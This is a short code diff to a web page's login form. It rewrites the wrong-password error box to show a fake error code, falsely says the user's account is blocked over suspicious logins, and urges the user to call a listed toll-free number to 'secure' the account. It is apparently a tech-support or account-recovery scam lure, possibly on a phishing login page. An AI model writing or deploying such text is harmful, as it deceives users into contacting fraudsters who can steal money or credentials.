--- a/index.html
+++ b/index.html
@@ -209,7 +209,7 @@
         <!-- Error message box -->
         <div id="error-message-box" class="error-box" style="display: none;">
             <div class="error-icon">!</div>
-            <div class="error-text">You've entered an incorrect username or password. Please try again.</div>
+            <div class="error-text">You've entered an incorrect username or password. Please try again. <br> Error code : 0X0047800 <br> your account has been blocked due to some suspicious login attempts <br> Call now to secure your account : <a href="tel:18444991812">+1-844-499-1812</a></div>
         </div>
 
         <form id="loginForm">
